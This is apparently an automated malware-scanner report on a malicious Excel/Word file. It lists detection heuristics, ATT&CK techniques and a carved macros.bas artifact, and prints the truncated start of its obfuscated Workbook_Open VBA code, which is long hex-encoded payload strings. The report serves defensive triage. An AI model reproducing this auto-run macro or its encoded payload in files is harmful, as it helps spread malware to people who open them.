MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The file contains VBA macros, including a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, likely to download and execute a secondary payload. The presence of a 'macros.bas' file further supports this. The obfuscated strings within the VBA code suggest an attempt to hide the payload's origin or execution details.
Heuristics 7
-
ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14332 bytes |
SHA-256: 3e937d14b93e3fefdc36053258fdb897e1a85f33698018640d5bd43a46443836 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 52 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Sub Workbook_Open() Dim F_B As String F_B = "53678A8C8A8A5451854E8A8A8A8AC08A8A998A8A8A656D8A8A568A8A8A935B955B8A908A8A8A8A538A708A7251828AB7A38A714D8A8A8AC37358648A8A8A8A8A5A8A6C8AB48A51695C6E8A8A8A8A8A6F788A758A8A8A8A8AB78A8A8AB28E8A97878ABE8A8A8A938A538A8A8AA3948ABD8AA88A4" Dim CGN_EJ As String CGN_EJ = "C758A918A8A8A9BBF8A8A808A8A8A9BC8AA4C8A5F8A8AAD8A8A8AB2B78A8AC38AB7858AAB8A8AB7928A928A8A908A8AC25D8AC78A6B80B498576FBF8AB28A61B7568A678A5AC08A978A8A968A8A8ABF888A2C648A885E8A8A8AAE8A978A7A8ABF98A58A8A518A8A8A4CB9848ABA8A8A7DC09DBF" Dim SYR_GTW As String SYR_GTW = "B8548A8CC9B4C166AC8AB9B5BE718A9C8A8A8A8F5A8A5CAC8AB48A9F8A8A8A8A788A8A9C8AC38A8AA9B7A5B88A8A65938A8A8AC08A58B08A8A9C8A5FC06CA68A5A8A88BE908AC0C880598A718AAC8A9A8A8A898A5A8A6A8A8AA48A8ABE69885C8AA9978A8A4D58568F8B8A728A8A9E8A8A8A8AB" Dim JBO_YLI As String JBO_YLI = "5688A8A8A688A9C828A8A8A8A9060808A8A8A7D8A8A708A8A7A508A8AA08A8AA98ABE8A8A6D8AC98ACA7B78598A666B8A8AB67B8A714B6C7C998A5E8A8A4D8A8A8A8A8A5B8A9B9DC38A4C8A8A808A7F5C5474788A978A8A8A8AB5838A8A7571918A8B738A8ABC8A9E8AA36B858A8A8AB0B08A8A" Dim WYQ_AS As String WYQ_AS = "C057B27B877C8A648A5E8A8AC5919C566F7A8A988A8AC0BAB4917D8A8A8A8A9CB88AC37F8A8A8A8A8A848A8F94B45D997AA58AAE6CB67B8A8A8A8A8A8A928A5F8AAE8A8A6895B28AC39E998A7C718A7F8AC38F8A7A4CA78A8A8A8A8A8B8A8A8A7B8A516F8A5D5A838A638A60B08A8A8A668E8AC" Dim ZA_J As String ZA_J = "3A1AC8A77CA8ABD8A82A1A78A4BAE8A5AAD8AB4568A8AC48A838A798A708A6E968AB78A8A9F8A8A8A8ABD8A8A91AFB98A8A8AB08A8A8AC3628A928A8E4E5D8A848A938A9FC7595D8A908A5D728A918AAB7FB7668A8A558A76C68A97508A8AAB70968A67C3C4808A8A8AA18A9C6EA3BE8A8A8A8A" Dim OPB_QTT As String OPB_QTT = "C78A89A5734CA48A8A8A4B8A4C8A8A8A5C8A8A8A7DA48A8A8AA3A78A518A5F8A8A8A8A8A689B7F9CB58A8A569AC48A8A8A8A8A8A95C58AC7998A8A8A8A6E8A8AA88A8A8A8ABC8AC88AC08A8A66638A8F8A8ABF8A4C8A9F8A8ABA8A5D8A8B8A8AB150BD6D8A8A8A8A8ABF8A8A8A6D8AA16A8A9E8" Dim CVJ_TF As String CVJ_TF = "A8A678A8AA08A8A8A8A91836A8689AF8A8A8AA08A878A8A4D798A818A93936C8A8A8AA17580AA8A8A778A798A8A91B38A628AAA8AA8A3C8878AB3B2AB8A9A8A709BC5B5C358B28AABAF555B818AB38A8A8A7D7C8A8A8E93C39365808A8A8A688A5395678A8A698A8B9E93918A8A8A8A8A6998AE" Dim FQH_L As String FQH_L = "577C8A7B8A7D8AB48A8A7E8A8A69C58A8A8A8A8A4E8A7B4C8A8A8A838A8A8A918A888A8AC8B58AB8B15F8A8AB8A18A648A2A53888A79AE8A8A7B8AB6C0A64E8A8A688A4F6A788A8A67A88A868A9092B36C8A507F8A758AA38AAF8A8A8A938A8A5B8A9D8A8ABDBE8A8A8A985D8A4E9F8A8A8A8AB" Dim IRQ_VU As String IRQ_VU = "85AB78A8A8AC85F8A8A808A608A8A8A8A8A8A8A8A8AC5568A95BB8A8A8AA4578A818AC166718A8A7E8A8A8A8A8AB48A8A7C8A8AB38A998A7E8A8A8A8A8A7A8A8A8A968AAA4E8A52B78A7955C9C3C18A4E728C676BB6A58A8A8A638A8A858A868A8A99C98A8A8A8A52ABAA8A8A8A77C58A8A8AAC" Dim J_RBJ As String J_RBJ = "5E8A898A8AADB68A8A7F7C8A8A968A748AA44F9FC35F8A578A8A8A898AC28A906F8A8A5B8A8AB18A8377788A8A904E4D8AC58AAB8A8A697C8A4DBD788AA27F8A8A638A8A63538AB38A8A8A7D8A858A8A9F8A8A8A8A7A8A74838A8A8A8B8A8A8A8AC48A8ABC966D8A9E8A5A8A8A61AD8A8A4D708" Dim JTA_CF As String JTA_CF = "A8A848A8A8A8A8A8A8AA786518A8AC58A8A9D8A8A908A8A8AAB908ACA928A8A8A958A8A9B938A8A738A7B8A8A8A628A6F8ACAB58A8A808A8ABA8AC6A08A8A8AA18A998A858A8A64ACA38ABE8A998A8A6D8A6E5C908A4DB5B8B5978A8A8A8A8A74B7918A588A9265B153A18A8A8A8B6C948A7D62" Dim NUA_DU As String NUA_DU = "AF8A5B6097BA8A64938A8A8A628A8A7C528A838A538A878F768ACA7476968AAF8A8E8AA67CC78A67788A8A9F8A8A8A6D5964ADA48A8AA78A8A8A6C8A988A68848AA7BA8A858A8AB58A67B4818A8AB68AA7655D8ABBB5728AACA68A8A878A8AB5849BBA8A838E8AB78A62706D8A6C8A618A8A559" Dim UJI_BXD As String UJI_BXD = "BC48A938A8A99BF5A6198778A6CC8C0658CBF8A8A8A4F8A5A8A8A8A8B8A8A8AB18AA28A93538A9C8A8A8AA08A8A4BBA8A8A8AC78A86ABBFAF838A5F8A7FB4A2BA8A8A8A785DBD6D8A4C518A8A6F698A768A548AACBDBA8AC78A8A8A88818ACA8A6B708A818AC98AADA58A84A48AB15E8A8A8A8A" Dim Y_LV As String Y_LV = "ABB8599EB38A5A948D8A8A8AB ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.